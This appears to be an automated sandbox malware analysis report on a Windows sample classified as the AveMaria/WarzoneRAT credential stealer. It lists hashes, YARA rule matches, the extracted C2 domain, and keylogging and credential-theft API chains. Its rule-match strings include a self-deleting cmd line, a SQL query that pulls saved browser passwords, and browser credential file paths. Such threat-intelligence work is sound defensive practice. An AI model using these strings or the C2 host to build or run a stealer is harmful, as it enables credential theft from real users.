Edit tour

Windows Analysis Report
ax4BSyUKd4.exe

Overview

General Information

Sample Name:	ax4BSyUKd4.exe
Original Sample Name:	66552aa98285ba1c58a90ae8eee06c7a.exe
Analysis ID:	898714
MD5:	66552aa98285ba1c58a90ae8eee06c7a
SHA1:	54b991528dff963d67707f69ff6f1c30ba04de8a
SHA256:	8880dce3daf97e67a978a171305d7fd8f487fc74793ec760580bdd19197d77fd
Tags:	32AveMariaRATexetrojan
Infos:

Detection

AveMaria

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected AveMaria stealer

Increases the number of concurrent connection per server for Internet Explorer

Contains functionality to hide user accounts

Contains functionality to steal e-mail passwords

Machine Learning detection for sample

Contains functionality to steal Chrome passwords or cookies

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Contains functionality to inject threads in other processes

Uses 32bit PE files

Contains functionality to create new users

Yara signature match

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Installs a raw input device (often for capturing keystrokes)

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to retrieve information about pressed keystrokes

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

ax4BSyUKd4.exe (PID: 6504 cmdline: C:\Users\user\Desktop\ax4BSyUKd4.exe MD5: 66552AA98285BA1C58A90AE8EEE06C7A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Malware Configuration

Threatname: AveMaria

{"C2 url": "feeders.ninqshing.net", "port": 443}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ax4BSyUKd4.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
ax4BSyUKd4.exe	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
ax4BSyUKd4.exe	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x18989:$r1: Classes\Folder\shell\open\command 0x189ac:$k1: DelegateExecute
ax4BSyUKd4.exe	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x17f54:$s1: RDPClip 0x18d58:$s2: Grabber 0x18348:$s3: Ave_Maria Stealer OpenSource 0x18448:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1817e:$s5: @\cmd.exe
ax4BSyUKd4.exe	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x18720:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17008:$a2: SMTP Password 0x16248:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x185a8:$a5: for /F "usebackq tokens=*" %%A in (" 0x16a38:$a6: \Torch\User Data\Default\Login Data 0x175a4:$a8: "os_crypt":{"encrypted_key":" 0x16ed0:$a10: \logins.json 0x1751c:$a11: Accounts\Account.rec0 0x18348:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
ax4BSyUKd4.exe	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
ax4BSyUKd4.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3120:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1a08:$a2: SMTP Password 0xc48:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2fa8:$a5: for /F "usebackq tokens=*" %%A in (" 0x1438:$a6: \Torch\User Data\Default\Login Data 0x1fa4:$a8: "os_crypt":{"encrypted_key":" 0x18d0:$a10: \logins.json 0x1f1c:$a11: Accounts\Account.rec0 0x2d48:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x2e48:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x7e50:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1730:$a2: SMTP Password 0x6738:$a2: SMTP Password 0x970:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x5978:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2cd0:$a5: for /F "usebackq tokens=" %%A in (" 0x7cd8:$a5: for /F "usebackq tokens=" %%A in (" 0x1160:$a6: \Torch\User Data\Default\Login Data 0x6168:$a6: \Torch\User Data\Default\Login Data 0x1ccc:$a8: "os_crypt":{"encrypted_key":" 0x6cd4:$a8: "os_crypt":{"encrypted_key":" 0x15f8:$a10: \logins.json 0x6600:$a10: \logins.json 0x1c44:$a11: Accounts\Account.rec0 0x6c4c:$a11: Accounts\Account.rec0 0x2a70:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper 0x7a78:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3e50:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x2738:$a2: SMTP Password 0x1978:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x3cd8:$a5: for /F "usebackq tokens=*" %%A in (" 0x2168:$a6: \Torch\User Data\Default\Login Data 0x2cd4:$a8: "os_crypt":{"encrypted_key":" 0x2600:$a10: \logins.json 0x2c4c:$a11: Accounts\Account.rec0 0x3a78:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3120:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1a08:$a2: SMTP Password 0xc48:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2fa8:$a5: for /F "usebackq tokens=*" %%A in (" 0x1438:$a6: \Torch\User Data\Default\Login Data 0x1fa4:$a8: "os_crypt":{"encrypted_key":" 0x18d0:$a10: \logins.json 0x1f1c:$a11: Accounts\Account.rec0 0x2d48:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x18740:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17028:$a2: SMTP Password 0x16268:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x185c8:$a5: for /F "usebackq tokens=*" %%A in (" 0x16a58:$a6: \Torch\User Data\Default\Login Data 0x175c4:$a8: "os_crypt":{"encrypted_key":" 0x16ef0:$a10: \logins.json 0x1753c:$a11: Accounts\Account.rec0 0x18368:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
Process Memory Space: ax4BSyUKd4.exe PID: 6504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.ax4BSyUKd4.exe.1030000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.ax4BSyUKd4.exe.1030000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
1.2.ax4BSyUKd4.exe.1030000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x18989:$r1: Classes\Folder\shell\open\command 0x189ac:$k1: DelegateExecute
1.2.ax4BSyUKd4.exe.1030000.0.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x18720:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17008:$a2: SMTP Password 0x16248:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x185a8:$a5: for /F "usebackq tokens=*" %%A in (" 0x16a38:$a6: \Torch\User Data\Default\Login Data 0x175a4:$a8: "os_crypt":{"encrypted_key":" 0x16ed0:$a10: \logins.json 0x1751c:$a11: Accounts\Account.rec0 0x18348:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
1.2.ax4BSyUKd4.exe.1030000.0.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
1.2.ax4BSyUKd4.exe.1030000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
1.0.ax4BSyUKd4.exe.1030000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.ax4BSyUKd4.exe.1030000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
1.0.ax4BSyUKd4.exe.1030000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x18989:$r1: Classes\Folder\shell\open\command 0x189ac:$k1: DelegateExecute
1.0.ax4BSyUKd4.exe.1030000.0.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x18720:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17008:$a2: SMTP Password 0x16248:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x185a8:$a5: for /F "usebackq tokens=*" %%A in (" 0x16a38:$a6: \Torch\User Data\Default\Login Data 0x175a4:$a8: "os_crypt":{"encrypted_key":" 0x16ed0:$a10: \logins.json 0x1751c:$a11: Accounts\Account.rec0 0x18348:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
1.0.ax4BSyUKd4.exe.1030000.0.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
1.0.ax4BSyUKd4.exe.1030000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
Click to see the 7 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: ax4BSyUKd4.exe

Malware Configuration Extractor: AveMaria {"C2 url": "feeders.ninqshing.net", "port": 443}

Multi AV Scanner detection for submitted file

Source: ax4BSyUKd4.exe

ReversingLabs: Detection: 97%

Antivirus / Scanner detection for submitted sample

Source: ax4BSyUKd4.exe

Avira: detected

Yara detected AveMaria stealer

Source: Yara match	File source: ax4BSyUKd4.exe, type: SAMPLE
Source: Yara match	File source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: ax4BSyUKd4.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,	1_2_0103A8C3
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	1_2_0103C3B9
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103C261 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_0103C261
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01039D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,	1_2_01039D97
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	1_2_0103C419
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103C6BD LocalAlloc,BCryptDecrypt,LocalFree,	1_2_0103C6BD

Source: ax4BSyUKd4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: ax4BSyUKd4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: ax4BSyUKd4.exe
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: ax4BSyUKd4.exe

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,		1_2_0103955B
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01041446 FindFirstFileW,FindNextFileW,		1_2_01041446

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0104154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

1_2_0104154A

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: feeders.ninqshing.net

Source: Joe Sandbox View

ASN Name: WEB2OBJECTSUS WEB2OBJECTSUS

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103290E URLDownloadToFileW,ShellExecuteW,

1_2_0103290E

Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443

Source: ax4BSyUKd4.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: ax4BSyUKd4.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Source: unknown

DNS traffic detected: queries for: feeders.ninqshing.net

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103577F setsockopt,recv,recv,

1_2_0103577F

Source: ax4BSyUKd4.exe, 00000001.00000002.808635246.000000000128A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01038793 DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

1_2_01038793

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

1_2_0103813A

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: ax4BSyUKd4.exe, type: SAMPLE
Source: Yara match	File source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01043695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

1_2_01043695

System Summary

Malicious sample detected (through community Yara rule)

Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: AveMaria_WarZone Author: unknown
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown

Source: ax4BSyUKd4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: ax4BSyUKd4.exe, type: SAMPLE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
